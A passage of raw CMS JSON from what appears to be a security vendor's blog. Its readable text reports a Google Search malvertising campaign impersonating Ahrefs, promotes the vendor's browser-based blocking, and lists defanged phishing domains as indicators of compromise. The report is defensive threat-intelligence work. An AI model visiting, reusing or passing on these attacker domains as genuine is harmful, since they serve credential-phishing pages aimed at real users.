",{"data":20948,"content":20949,"nodeType":883},{"uri":13019},[20950],{"data":20951,"marks":20952,"value":315,"nodeType":864},{},[20953],{"type":1455},{"data":20955,"marks":20956,"value":20957,"nodeType":864},{},[]," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search). This isn’t just targeting ad manager accounts — last year, we reported on campaigns impersonating ",{"data":20959,"content":20960,"nodeType":883},{"uri":6912},[20961],{"data":20962,"marks":20963,"value":20965,"nodeType":864},{},[20964],{"type":1455},"TradingView",{"data":20967,"marks":20968,"value":3731,"nodeType":864},{},[],{"data":20970,"content":20972,"nodeType":883},{"uri":20971},"https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/",[20973],{"data":20974,"marks":20975,"value":20977,"nodeType":864},{},[20976],{"type":1455},"Microsoft Office 365",{"data":20979,"marks":20980,"value":2232,"nodeType":864},{},[],{"data":20982,"content":20984,"nodeType":883},{"uri":20983},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers/",[20985],{"data":20986,"marks":20987,"value":20989,"nodeType":864},{},[20988],{"type":1455},"Onfido",{"data":20991,"marks":20992,"value":20993,"nodeType":864},{},[],", to name a few. ",{"data":20995,"content":20996,"nodeType":860},{},[20997],{"data":20998,"marks":20999,"value":21000,"nodeType":864},{},[],"There’s a tendency to see malvertising as a more random attack, but Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",{"data":21002,"content":21003,"nodeType":860},{},[21004],{"data":21005,"marks":21006,"value":21007,"nodeType":864},{},[],"Because these attacks completely circumvent the traditional phishing detection surface (email) and often happen entirely over the internet (meaning no endpoint security controls can come into play) the only way to reliably detect and stop these attacks is to intercept them where they happen — in the user’s web browser. ",{"data":21009,"content":21010,"nodeType":1005},{},[],{"data":21012,"content":21013,"nodeType":1009},{},[21014],{"data":21015,"marks":21016,"value":21018,"nodeType":864},{},[21017],{"type":899},"How Push stopped the attack",{"data":21020,"content":21021,"nodeType":860},{},[21022],{"data":21023,"marks":21024,"value":21025,"nodeType":864},{},[],"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser, where Push is waiting to detect and block the attack. Even if the page has never been previously flagged as suspicious or malicious, Push analyses the page in real time and blocks it — protecting against the latest zero-day threats.  ",{"data":21027,"content":21028,"nodeType":860},{},[21029],{"data":21030,"marks":21031,"value":21032,"nodeType":864},{},[],"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and shuts it down.",{"data":21034,"content":21035,"nodeType":860},{},[21036],{"data":21037,"marks":21038,"value":21039,"nodeType":864},{},[],"Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",{"data":21041,"content":21042,"nodeType":860},{},[21043,21046,21053,21056,21063],{"data":21044,"marks":21045,"value":16314,"nodeType":864},{},[],{"data":21047,"content":21048,"nodeType":883},{"uri":10269},[21049],{"data":21050,"marks":21051,"value":10275,"nodeType":864},{},[21052],{"type":1455},{"data":21054,"marks":21055,"value":19754,"nodeType":864},{},[],{"data":21057,"content":21058,"nodeType":883},{"uri":1700},[21059],{"data":21060,"marks":21061,"value":10299,"nodeType":864},{},[21062],{"type":1455},{"data":21064,"marks":21065,"value":2924,"nodeType":864},{},[],{"data":21067,"content":21068,"nodeType":1005},{},[],{"data":21070,"content":21071,"nodeType":1009},{},[21072],{"data":21073,"marks":21074,"value":5571,"nodeType":864},{},[21075],{"type":899},{"data":21077,"content":21078,"nodeType":860},{},[21079,21082,21089],{"data":21080,"marks":21081,"value":12615,"nodeType":864},{},[],{"data":21083,"content":21084,"nodeType":883},{"uri":7248},[21085],{"data":21086,"marks":21087,"value":7253,"nodeType":864},{},[21088],{"type":1455},{"data":21090,"marks":21091,"value":18496,"nodeType":864},{},[],{"data":21093,"content":21094,"nodeType":860},{},[21095],{"data":21096,"marks":21097,"value":21098,"nodeType":864},{},[],"That said, the domains observed in this chain were:",{"data":21100,"content":21101,"nodeType":941},{},[21102,21112,21122,21132],{"data":21103,"content":21104,"nodeType":945},{},[21105],{"data":21106,"content":21107,"nodeType":860},{},[21108],{"data":21109,"marks":21110,"value":21111,"nodeType":864},{},[],"comandd-ok[.]com",{"data":21113,"content":21114,"nodeType":945},{},[21115],{"data":21116,"content":21117,"nodeType":860},{},[21118],{"data":21119,"marks":21120,"value":21121,"nodeType":864},{},[],"ahrefs-ac.squarespace[.]com",{"data":21123,"content":21124,"nodeType":945},{},[21125],{"data":21126,"content":21127,"nodeType":860},{},[21128],{"data":21129,"marks":21130,"value":21131,"nodeType":864},{},[],"ahrefs-seo-app.squarespace[.]com",{"data":21133,"content":21134,"nodeType":945},{},[21135],{"data":21136,"content":21137,"nodeType":860},{},[21138],{"data":21139,"marks":21140,"value":21141,"nodeType":864},{},[],"slgn-ahrefs-app-com.squarespace[.]com",{"data":21143,"content":21144,"nodeType":860},{},[21145],{"data":21146,"marks":21147,"value":21148,"nodeType":864},{},[],"[Update 24th February] We also observed the following new domains:",{"data":21150,"content":21151,"nodeType":941},{},[21152,21162,21172,21182],{"data":21153,"content":21154,"nodeType":945},{},[21155],{"data":21156,"content":21157,"nodeType":860},{},[21158],{"data":21159,"marks":21160,"value":21161,"nodeType":864},{},[],"www-ahrefs-seo-ads[.]surge.sh",{"data":21163,"content":21164,"nodeType":945},{},[21165],{"data":21166,"content":21167,"nodeType":860},{},[21168],{"data":21169,"marks":21170,"value":21171,"nodeType":864},{},[],"web-semrush-seo-wold[.]surge[.]sh",{"data":21173,"content":21174,"nodeType":945},{},[21175],{"data":21176,"content":21177,"nodeType":860},{},[21178],{"data":21179,"marks":21180,"value":21181,"nodeType":864},{},[],"contabelforeehc[.]com",{"data":21183,"content":21184,"nodeType":945},{},[21185],{"data":21186,"content":21187,"nodeType":860},{},[21188],{"data":21189,"marks":21190,"value":21191,"nodeType":864},{},[],"contabelfore[.]com",{"data":21193,"content":21194,"nodeType":860},{},[21195],{"data":21196,"marks":21197,"value":21198,"nodeType":864},{},[],"In addition, the following domains were previously associated with the attacks we detected in December:",{"data":21200,"content":21201,"nodeType":941},{},[21202,21212,21222,21232,21242,21252,21262],{"data":21203,"content":21204,"nodeType":945},{},[21205],{"data":21206,"content":21207,"nodeType":860},{},[21208],{"data":21209,"marks":21210,"value":21211,"nodeType":864},{},[],"ads-adsword1.odoo[.]com",{"data":21213,"content":21214,"nodeType":945},{},[21215],{"data":21216,"content":21217,"nodeType":860},{},[21218],{"data":21219,"marks":21220,"value":21221,"nodeType":864},{},[],"sing-operador2[.]click/accounts/v3/login",{"data":21223,"content":21224,"nodeType":945},{},[21225],{"data":21226,"content":21227,"nodeType":860},{},[21228],{"data":21229,"marks":21230,"value":21231,"nodeType":864},{},[],"adsgooglie.odoo[.]com/",{"data":21233,"content":21234,"nodeType":945},{},[21235],{"data":21236,"content":21237,"nodeType":860},{},[21238],{"data":21239,"marks":21240,"value":21241,"nodeType":864},{},[],"word4only[.]online/",{"data":21243,"content":21244,"nodeType":945},{},[21245],{"data":21246,"content":21247,"nodeType":860},{},[21248],{"data":21249,"marks":21250,"value":21251,"nodeType":864},{},[],"adsloginacess.kartra[.]com/page/oeN7",{"data":21253,"content":21254,"nodeType":945},{},[21255],{"data":21256,"content":21257,"nodeType":860},{},[21258],{"data":21259,"marks":21260,"value":21261,"nodeType":864},{},[],"ads-o.odoo[.]com",{"data":21263,"content":21264,"nodeType":945},{},[21265],{"data":21266,"content":21267,"nodeType":860},{},[21268],{"data":21269,"marks":21270,"value":21271,"nodeType":864},{},[],"operador8-ads[.]lat/accounts/v3/login/",{"data":21273,"content":21274,"nodeType":860},{},[21275],{"data":21276,"marks":21277,"value":7196,"nodeType":864},{},[21278],{"type":899},"Google Search malvertising campaign continues, now impersonating Ahrefs","New samples linked to a Push-tracked malvertising campaign detected, targeting Google accounts via an Ahrefs lure. ","2026-01-12T00:00:00.000Z","google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"items":21284},[21285,21287],{"sys":21286,"name":342},{"id":6596},{"sys":21288,"name":6593},{"id":6592},{"items":21290},[21291],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":21292},{"url":2740},"tiktok-phishing","blog/tiktok-phishing",{"json":21296},{"data":21297,"content":21298,"nodeType":856},{},[21299],{"data":21300,"content":21301,"nodeType":860},{},[21302],{"data":21303,"marks":21304,"value":21305,"nodeType":864},{},[],"We’ve identified a new wave of AITM phishing pages designed to hijack TikTok accounts. This seems like a weird target at first glance, but TikTok accounts are ripe for abuse in malvertising scams. ","Investigating a new wave of AITM phishing pages designed to hijack TikTok accounts.",{"id":21308,"publishedAt":21309},"1iOnp8gcu1tEUvkqOZsdFd","2026-08-12T11:53:03.984Z",{"items":21311},[21312,21314],{"sys":21313,"name":6593},{"id":6592},{"sys":21315,"name":342},{"id":6596},{"items":21317},[21318,21320,21322,21324,21326,21328,21330,21332,21334,21336,21338,21340,21342],{"sys":21319,"name":279,"slug":280,"tier":31},{"id":276},{"sys":21321,"name":519,"slug":520,"tier":31},{"id":516},{"sys":21323,"name":342,"slug":343,"tier":31},{"id":339},{"sys":21325,"name":642,"slug":643,"tier":31},{"id":639},{"sys":21327,"name":261,"slug":262,"tier":45},{"id":258},{"sys":21329,"name":571,"slug":572,"tier":45},{"id":568},{"sys":21331,"name":440,"slug":441,"tier":45},{"id":437},{"sys":21333,"name":607,"slug":608,"tier":45},{"id":604},{"sys":21335,"name":324,"slug":325,"tier":45},{"id":321},{"sys":21337,"name":422,"slug":423,"tier":45},{"id":419},{"sys":21339,"name":431,"slug":432,"tier":45},{"id":428},{"sys":21341,"name":315,"slug":316,"tier":45},{"id":312},{"sys":21343,"name":475,"slug":476,"tier":45},{"id":472},"2QzODApgAyCDdKXUqZsIixHK-lMHFS0k-JD0u04_nQ4",{"id":21346,"title":10759,"authorsCollection":21347,"content":21353,"extension":228,"faqItemsCollection":22448,"faqTitle":59,"featured":6,"hashTags":59,"meta":22450,"metaTitle":22451,"ogImage":59,"postType":5740,"publishedDate":10761,"relatedBlogPostsCollection":22452,"slug":10762,"stem":24507,"subtitle":59,"summary":24508,"synopsis":10760,"sys":24519,"tagsCollection":24521,"topicsCollection":24527,"__hash__":24553},"blog/blog/installfix.json",{"items":21348},[21349],{"fullName":10772,"firstName":10773,"jobTitle":10774,"socialLinks":21350,"profilePicture":21352},[21351],"https://www.linkedin.com/in/jacques-louw-o-62608594/",{"url":10776},{"json":21354,"links":22240},{"data":21355,"content":21356,"nodeType":856},{},[21357,21362,21368,21374,21381,21394,21399,21402,21409,21415,21421,21427,21433,21439,21445,21451,21457,21462,21467,21473,21478,21484,21490,21495,21500,21505,21510,21526,21536,21542,21547,21553,21559,21589,21595,21602,21608,21613,21619,21624,21630,21646,21652,21655,21662,21668,21751,21757,21762,21765,21772,21778,21784,21790,21826,21829,21836,21852,21858,21865,22057,22064,22094,22101,22108,22114,22121,22127,22134,22144,22151,22157,22164,22174,22181,22188,22195,22202,22209,22216,22226,22233],{"data":21358,"content":21361,"nodeType":996},{"target":21359},{"sys":21360},{"id":9763,"type":1001,"linkType":1002},[],{"data":21363,"content":21364,"nodeType":860},{},[21365],{"data":21366,"marks":21367,"value":9771,"nodeType":864},{},[],{"data":21369,"content":21370,"nodeType":860},{},[21371],{"data":21372,"marks":21373,"value":9778,"nodeType":864},{},[],{"data":21375,"content":21376,"nodeType":860},{},[21377],{"data":21378,"marks":21379,"value":9786,"nodeType":864},{},[21380],{"type":899},{"data":21382,"content":21383,"nodeType":860},{},[21384,21387,21391],{"data":21385,"marks":21386,"value":9793,"nodeType":864},{},[],{"data":21388,"marks":21389,"value":6029,"nodeType":864},{},[21390],{"type":899},{"data":21392,"marks":21393,"value":9801,"nodeType":864},{},[],{"data":21395,"content":21398,"nodeType":996},{"target":21396},{"sys":21397},{"id":9806,"type":1001,"linkType":1002},[],{"data":21400,"content":21401,"nodeType":1005},{},[],{"data":21403,"content":21404,"nodeType":1009},{},[21405],{"data":21406,"marks":21407,"value":9818,"nodeType":864},{},[21408],{"type":899},{"data":21410,"content":21411,"nodeType":860},{},[21412],{"data":21413,"marks":21414,"value":9825,"nodeType":864},{},[],{"data":21416,"content":21417,"nodeType":860},{},[21418],{"data":21419,"marks":21420,"value":9832,"nodeType":864},{},[],{"data":21422,"content":21423,"nodeType":1312},{},[21424],{"data":21425,"marks":21426,"value":9839,"nodeType":864},{},[],{"data":21428,"content":21429,"nodeType":860},{},[21430],{"data":21431,"marks":21432,"value":9846,"nodeType":864},{},[],{"data":21434,"content":21435,"nodeType":860},{},[21436],{"data":21437,"marks":21438,"value":9853,"nodeType":864},{},[],{"data":21440,"content":21441,"nodeType":860},{},[21442],{"data":21443,"marks":21444,"value":9860,"nodeType":864},{},[],{"data":21446,"content":21447,"nodeType":860},{},[21448],{"data":21449,"marks":21450,"value":9867,"nodeType":864},{},[],{"data":21452,"content":21453,"nodeType":860},{},[21454],{"data":21455,"marks":21456,"value":9874,"nodeType":864},{},[],{"data":21458,"content":21461,"nodeType":996},{"target":21459},{"sys":21460},{"id":9879,"type":1001,"linkType":1002},[],{"data":21463,"content":21466,"nodeType":996},{"target":21464},{"sys":21465},{"id":9885,"type":1001,"linkType":1002},[],{"data":21468,"content":21469,"nodeType":860},{},[21470],{"data":21471,"marks":21472,"value":9893,"nodeType":864},{},[],{"data":21474,"content":21477,"nodeType":996},{"target":21475},{"sys":21476},{"id":9898,"type":1001,"linkType":1002},[],{"data":21479,"content":21480,"nodeType":1312},{},[21481],{"data":21482,"marks":21483,"value":9906,"nodeType":864},{},[],{"data":21485,"content":21486,"nodeType":860},{},[21487],{"data":21488,"marks":21489,"value":9913,"nodeType":864},{},[],{"data":21491,"content":21494,"nodeType":996},{"target":21492},{"sys":21493},{"id":9918,"type":1001,"linkType":1002},[],{"data":21496,"content":21499,"nodeType":996},{"target":21497},{"sys":21498},{"id":9924,"type":1001,"linkType":1002},[],{"data":21501,"content":21504,"nodeType":996},{"target":21502},{"sys":21503},{"id":9930,"type":1001,"linkType":1002},[],{"data":21506,"content":21509,"nodeType":996},{"target":21507},{"sys":21508},{"id":9936,"type":1001,"linkType":1002},[],{"data":21511,"content":21512,"nodeType":860},{},[21513,21516,21523],{"data":21514,"marks":21515,"value":9944,"nodeType":864},{},[],{"data":21517,"content":21518,"nodeType":883},{"uri":9013},[21519],{"data":21520,"marks":21521,"value":9952,"nodeType":864},{},[21522],{"type":1455},{"data":21524,"marks":21525,"value":9956,"nodeType":864},{},[],{"data":21527,"content":21528,"nodeType":860},{},[21529,21533],{"data":21530,"marks":21531,"value":9964,"nodeType":864},{},[21532],{"type":899},{"data":21534,"marks":21535,"value":9968,"nodeType":864},{},[],{"data":21537,"content":21538,"nodeType":860},{},[21539],{"data":21540,"marks":21541,"value":9975,"nodeType":864},{},[],{"data":21543,"content":21546,"nodeType":996},{"target":21544},{"sys":21545},{"id":9980,"type":1001,"linkType":1002},[],{"data":21548,"content":21549,"nodeType":1312},{},[21550],{"data":21551,"marks":21552,"value":9988,"nodeType":864},{},[],{"data":21554,"content":21555,"nodeType":860},{},[21556],{"data":21557,"marks":21558,"value":9995,"nodeType":864},{},[],{"data":21560,"content":21561,"nodeType":941},{},[21562,21571,21580],{"data":21563,"content":21564,"nodeType":945},{},[21565],{"data":21566,"content":21567,"nodeType":860},{},[21568],{"data":21569,"marks":21570,"value":10008,"nodeType":864},{},[],{"data":21572,"content":21573,"nodeType":945},{},[21574],{"data":21575,"content":21576,"nodeType":860},{},[21577],{"data":21578,"marks":21579,"value":10018,"nodeType":864},{},[],{"data":21581,"content":21582,"nodeType":945},{},[21583],{"data":21584,"content":21585,"nodeType":860},{},[21586],{"data":21587,"marks":21588,"value":10028,"nodeType":864},{},[],{"data":21590,"content":21591,"nodeType":860},{},[21592],{"data":21593,"marks":21594,"value":10035,"nodeType":864},{},[],{"data":21596,"content":21597,"nodeType":860},{},[21598],{"data":21599,"marks":21600,"value":10043,"nodeType":864},{},[21601],{"type":899},{"data":21603,"content":21604,"nodeType":860},{},[21605],{"data":21606,"marks":21607,"value":10050,"nodeType":864},{},[],{"data":21609,"content":21612,"nodeType":996},{"target":21610},{"sys":21611},{"id":10055,"type":1001,"linkType":1002},[],{"data":21614,"content":21615,"nodeType":860},{},[21616],{"data":21617,"marks":21618,"value":10063,"nodeType":864},{},[],{"data":21620,"content":21623,"nodeType":996},{"target":21621},{"sys":21622},{"id":10068,"type":1001,"linkType":1002},[],{"data":21625,"content":21626,"nodeType":1312},{},[21627],{"data":21628,"marks":21629,"value":10076,"nodeType":864},{},[],{"data":21631,"content":21632,"nodeType":860},{},[21633,21636,21643],{"data":21634,"marks":21635,"value":10083,"nodeType":864},{},[],{"data":21637,"content":21638,"nodeType":883},{"uri":7124},[21639],{"data":21640,"marks":21641,"value":7129,"nodeType":864},{},[21642],{"type":1455},{"data":21644,"marks":21645,"value":10094,"nodeType":864},{},[],{"data":21647,"content":21648,"nodeType":860},{},[21649],{"data":21650,"marks":21651,"value":10101,"nodeType":864},{},[],{"data":21653,"content":21654,"nodeType":1005},{},[],{"data":21656,"content":21657,"nodeType":1009},{},[21658],{"data":21659,"marks":21660,"value":10112,"nodeType":864},{},[21661],{"type":899},{"data":21663,"content":21664,"nodeType":860},{},[21665],{"data":21666,"marks":21667,"value":10119,"nodeType":864},{},[],{"data":21669,"content":21670,"nodeType":941},{},[21671,21691,21711,21731],{"data":21672,"content":21673,"nodeType":945},{},[21674],{"data":21675,"content":21676,"nodeType":860},{},[21677,21680,21688],{"data":21678,"marks":21679,"value":21,"nodeType":864},{},[],{"data":21681,"content":21682,"nodeType":883},{"uri":10134},[21683],{"data":21684,"marks":21685,"value":10141,"nodeType":864},{},[21686,21687],{"type":1455},{"type":899},{"data":21689,"marks":21690,"value":10145,"nodeType":864},{},[],{"data":21692,"content":21693,"nodeType":945},{},[21694],{"data":21695,"content":21696,"nodeType":860},{},[21697,21700,21708],{"data":21698,"marks":21699,"value":21,"nodeType":864},{},[],{"data":21701,"content":21702,"nodeType":883},{"uri":10157},[21703],{"data":21704,"marks":21705,"value":10164,"nodeType":864},{},[21706,21707],{"type":1455},{"type":899},{"data":21709,"marks":21710,"value":10168,"nodeType":864},{},[],{"data":21712,"content":21713,"nodeType":945},{},[21714],{"data":21715,"content":21716,"nodeType":860},{},[21717,21720,21728],{"data":21718,"marks":21719,"value":21,"nodeType":864},{},[],{"data":21721,"content":21722,"nodeType":883},{"uri":10180},[21723],{"data":21724,"marks":21725,"value":10187,"nodeType":864},{},[21726,21727],{"type":1455},{"type":899},{"data":21729,"marks":21730,"value":10191,"nodeType":864},{},[],{"data":21732,"content":21733,"nodeType":945},{},[21734],{"data":21735,"content":21736,"nodeType":860},{},[21737,21740,21748],{"data":21738,"marks":21739,"value":21,"nodeType":864},{},[],{"data":21741,"content":21742,"nodeType":883},{"uri":10203},[21743],{"data":21744,"marks":21745,"value":10210,"nodeType":864},{},[21746,21747],{"type":1455},{"type":899},{"data":21749,"marks":21750,"value":10214,"nodeType":864},{},[],{"data":21752,"content":21753,"nodeType":860},{},[21754],{"data":21755,"marks":21756,"value":10221,"nodeType":864},{},[],{"data":21758,"content":21761,"nodeType":996},{"target":21759},{"sys":21760},{"id":10226,"type":1001,"linkType":1002},[],{"data":21763,"content":21764,"nodeType":1005},{},[],{"data":21766,"content":21767,"nodeType":1312},{},[21768],{"data":21769,"marks":21770,"value":10238,"nodeType":864},{},[21771],{"type":899},{"data":21773,"content":21774,"nodeType":860},{},[21775],{"data":21776,"marks":21777,"value":10245,"nodeType":864},{},[],{"data":21779,"content":21780,"nodeType":860},{},[21781],{"data":21782,"marks":21783,"value":10252,"nodeType":864},{},[],{"data":21785,"content":21786,"nodeType":860},{},[21787],{"data":21788,"marks":21789,"value":10259,"nodeType":864},{},[],{"data":21791,"content":21792,"nodeType":860},{},[21793,21796,21803,21806,21813,21816,21823],{"data":21794,"marks":21795,"value":10266,"nodeType":864},{},[],{"data":21797,"content":21798,"nodeType":883},{"uri":10269},[21799],{"data":21800,"marks":21801,"value":10275,"nodeType":864},{},[21802],{"type":1455},{"data":21804,"marks":21805,"value":3731,"nodeType":864},{},[],{"data":21807,"content":21808,"nodeType":883},{"uri":10281},[21809],{"data":21810,"marks":21811,"value":10287,"nodeType":864},{},[21812],{"type":1455},{"data":21814,"marks":21815,"value":10291,"nodeType":864},{},[],{"data":21817,"content":21818,"nodeType":883},{"uri":1700},[21819],{"data":21820,"marks":21821,"value":10299,"nodeType":864},{},[21822],{"type":1455},{"data":21824,"marks":21825,"value":2924,"nodeType":864},{},[],{"data":21827,"content":21828,"nodeType":1005},{},[],{"data":21830,"content":21831,"nodeType":1009},{},[21832],{"data":21833,"marks":21834,"value":5571,"nodeType":864},{},[21835],{"type":899},{"data":21837,"content":21838,"nodeType":860},{},[21839,21842,21849],{"data":21840,"marks":21841,"value":7245,"nodeType":864},{},[],{"data":21843,"content":21844,"nodeType":883},{"uri":7248},[21845],{"data":21846,"marks":21847,"value":7253,"nodeType":864},{},[21848],{"type":1455},{"data":21850,"marks":21851,"value":7257,"nodeType":864},{},[],{"data":21853,"content":21854,"nodeType":860},{},[21855],{"data":21856,"marks":21857,"value":10335,"nodeType":864},{},[],{"data":21859,"content":21860,"nodeType":860},{},[21861],{"data":21862,"marks":21863,"value":10343,"nodeType":864},{},[21864],{"type":899},{"data":21866,"content":21867,"nodeType":941},{},[21868,21877,21886,21895,21904,21913,21922,21931,21940,21949,21958,21967,21976,21985,21994,22003,22012,22021,22030,22039,22048],{"data":21869,"content":21870,"nodeType":945},{},[21871],{"data":21872,"content":21873,"nodeType":860},{},[21874],{"data":21875,"marks":21876,"value":10356,"nodeType":864},{},[],{"data":21878,"content":21879,"nodeType":945},{},[21880],{"data":21881,"content":21882,"nodeType":860},{},[21883],{"data":21884,"marks":21885,"value":10366,"nodeType":864},{},[],{"data":21887,"content":21888,"nodeType":945},{},[21889],{"data":21890,"content":21891,"nodeType":860},{},[21892],{"data":21893,"marks":21894,"value":10376,"nodeType":864},{},[],{"data":21896,"content":21897,"nodeType":945},{},[21898],{"data":21899,"content":21900,"nodeType":860},{},[21901],{"data":21902,"marks":21903,"value":10386,"nodeType":864},{},[],{"data":21905,"content":21906,"nodeType":945},{},[21907],{"data":21908,"content":21909,"nodeType":860},{},[21910],{"data":21911,"marks":21912,"value":10396,"nodeType":864},{},[],{"data":21914,"content":21915,"nodeType":945},{},[21916],{"data":21917,"content":21918,"nodeType":860},{},[21919],{"data":21920,"marks":21921,"value":10386,"nodeType":864},{},[],{"data":21923,"content":21924,"nodeType":945},{},[21925],{"data":21926,"content":21927,"nodeType":860},{},[21928],{"data":21929,"marks":21930,"value":10415,"nodeType":864},{},[],{"data":21932,"content":21933,"nodeType":945},{},[21934],{"data":21935,"content":21936,"nodeType":860},{},[21937],{"data":21938,"marks":21939,"value":10425,"nodeType":864},{},[],{"data":21941,"content":21942,"nodeType":945},{},[21943],{"data":21944,"content":21945,"nodeType":860},{},[21946],{"data":21947,"marks":21948,"value":10366,"nodeType":864},{},[],{"data":21950,"content":21951,"nodeType":945},{},[21952],{"data":21953,"content":21954,"nodeType":860},{},[21955],{"data":21956,"marks":21957,"value":10444,"nodeType":864},{},[],{"data":21959,"content":21960,"nodeType":945},{},[21961],{"data":21962,"content":21963,"nodeType":860},{},[21964],{"data":21965,"marks":21966,"value":10454,"nodeType":864},{},[],{"data":21968,"content":21969,"nodeType":945},{},[21970],{"data":21971,"content":21972,"nodeType":860},{},[21973],{"data":21974,"marks":21975,"value":10464,"nodeType":864},{},[],{"data":21977,"content":21978,"nodeType":945},{},[21979],{"data":21980,"content":21981,"nodeType":860},{},[21982],{"data":21983,"marks":21984,"value":10474,"nodeType":864},{},[],{"data":21986,"content":21987,"nodeType":945},{},[21988],{"data":21989,"content":21990,"nodeType":860},{},[21991],{"data":21992,"marks":21993,"value":10484,"nodeType":864},{},[],{"data":21995,"content":21996,"nodeType":945},{},[21997],{"data":21998,"content":21999,"nodeType":860},{},[22000],{"data":22001,"marks":22002,"value":10494,"nodeType":864},{},[],{"data":22004,"content":22005,"nodeType":945},{},[22006],{"data":22007,"content":22008,"nodeType":860},{},[22009],{"data":22010,"marks":22011,"value":10504,"nodeType":864},{},[],{"data":22013,"content":22014,"nodeType":945},{},[22015],{"data":22016,"content":22017,"nodeType":860},{},[22018],{"data":22019,"marks":22020,"value":10425,"nodeType":864},{},[],{"data":22022,"content":22023,"nodeType":945},{},[22024],{"data":22025,"content":22026,"nodeType":860},{},[22027],{"data":22028,"marks":22029,"value":10523,"nodeType":864},{},[],{"data":22031,"content":22032,"nodeType":945},{},[22033],{"data":22034,"content":22035,"nodeType":860},{},[22036],{"data":22037,"marks":22038,"value":10533,"nodeType":864},{},[],{"data":22040,"content":22041,"nodeType":945},{},[22042],{"data":22043,"content":22044,"nodeType":860},{},[22045],{"data":22046,"marks":22047,"value":10543,"nodeType":864},{},[],{"data":22049,"content":22050,"nodeType":945},{},[22051],{"data":22052,"content":22053,"nodeType":860},{},[22054],{"data":22055,"marks":22056,"value":10553,"nodeType":864},{},[],{"data":22058,"content":22059,"nodeType":860},{},[22060],{"data":22061,"marks":22062,"value":10561,"nodeType":864},{},[22063],{"type":899},{"data":22065,"content":22066,"nodeType":941},{},[22067,22076,22085],{"data":22068,"content":22069,"nodeType":945},{},[22070],{"data":22071,"content":22072,"nodeType":860},{},[22073],{"data":22074,"marks":22075,"value":10574,"nodeType":864},{},[],{"data":22077,"content":22078,"nodeType":945},{},[22079],{"data":22080,"content":22081,"nodeType":860},{},[22082],{"data":22083,"marks":22084,"value":10584,"nodeType":864},{},[],{"data":22086,"content":22087,"nodeType":945},{},[22088],{"data":22089,"content":22090,"nodeType":860},{},[22091],{"data":22092,"marks":22093,"value":10594,"nodeType":864},{},[],{"data":22095,"content":22096,"nodeType":860},{},[22097],{"data":22098,"marks":22099,"value":10602,"nodeType":864},{},[22100],{"type":899},{"data":22102,"content":22103,"nodeType":860},{},[22104],{"data":22105,"marks":22106,"value":10611,"nodeType":864},{},[22107],{"type":10610},{"data":22109,"content":22110,"nodeType":860},{},[22111],{"data":22112,"marks":22113,"value":21,"nodeType":864},{},[],{"data":22115,"content":22116,"nodeType":860},{},[22117],{"data":22118,"marks":22119,"value":10625,"nodeType":864},{},[22120],{"type":10610},{"data":22122,"content":22123,"nodeType":860},{},[22124],{"data":22125,"marks":22126,"value":10632,"nodeType":864},{},[],{"data":22128,"content":22129,"nodeType":860},{},[22130],{"data":22131,"marks":22132,"value":10640,"nodeType":864},{},[22133],{"type":10610},{"data":22135,"content":22136,"nodeType":860},{},[22137,22140],{"data":22138,"marks":22139,"value":10632,"nodeType":864},{},[],{"data":22141,"marks":22142,"value":10651,"nodeType":864},{},[22143],{"type":899},{"data":22145,"content":22146,"nodeType":860},{},[22147],{"data":22148,"marks":22149,"value":10659,"nodeType":864},{},[22150],{"type":10610},{"data":22152,"content":22153,"nodeType":860},{},[22154],{"data":22155,"marks":22156,"value":21,"nodeType":864},{},[],{"data":22158,"content":22159,"nodeType":860},{},[22160],{"data":22161,"marks":22162,"value":10673,"nodeType":864},{},[22163],{"type":10610},{"data":22165,"content":22166,"nodeType":860},{},[22167,22170],{"data":22168,"marks":22169,"value":10632,"nodeType":864},{},[],{"data":22171,"marks":22172,"value":10684,"nodeType":864},{},[22173],{"type":899},{"data":22175,"content":22176,"nodeType":860},{},[22177],{"data":22178,"marks":22179,"value":10692,"nodeType":864},{},[22180],{"type":10610},{"data":22182,"content":22183,"nodeType":860},{},[22184],{"data":22185,"marks":22186,"value":10700,"nodeType":864},{},[22187],{"type":10610},{"data":22189,"content":22190,"nodeType":860},{},[22191],{"data":22192,"marks":22193,"value":10708,"nodeType":864},{},[22194],{"type":10610},{"data":22196,"content":22197,"nodeType":860},{},[22198],{"data":22199,"marks":22200,"value":10716,"nodeType":864},{},[22201],{"type":10610},{"data":22203,"content":22204,"nodeType":860},{},[22205],{"data":22206,"marks":22207,"value":10724,"nodeType":864},{},[22208],{"type":10610},{"data":22210,"content":22211,"nodeType":860},{},[22212],{"data":22213,"marks":22214,"value":10732,"nodeType":864},{},[22215],{"type":10610},{"data":22217,"content":22218,"nodeType":860},{},[22219,22222],{"data":22220,"marks":22221,"value":10632,"nodeType":864},{},[],{"data":22223,"marks":22224,"value":10743,"nodeType":864},{},[22225],{"type":899},{"data":22227,"content":22228,"nodeType":860},{},[22229],{"data":22230,"marks":22231,"value":10692,"nodeType":864},{},[22232],{"type":10610},{"data":22234,"content":22235,"nodeType":860},{},[22236],{"data":22237,"marks":22238,"value":10758,"nodeType":864},{},[22239],{"type":10610},{"entries":22241},{"hyperlink":22242,"inline":22243,"block":22244},[],[],[22245,22264,22298,22303,22309,22316,22321,22327,22335,22377,22380,22401,22443],{"sys":22246,"__typename":1740,"content":22247,"name":22263,"title":59},{"id":9763},{"json":22248},{"nodeType":856,"data":22249,"content":22250},{},[22251],{"nodeType":860,"data":22252,"content":22253},{},[22254,22259],{"nodeType":864,"value":22255,"marks":22256,"data":22258},"Update March 16:",[22257],{"type":899},{},{"nodeType":864,"value":22260,"marks":22261,"data":22262}," We've identified a number of additional 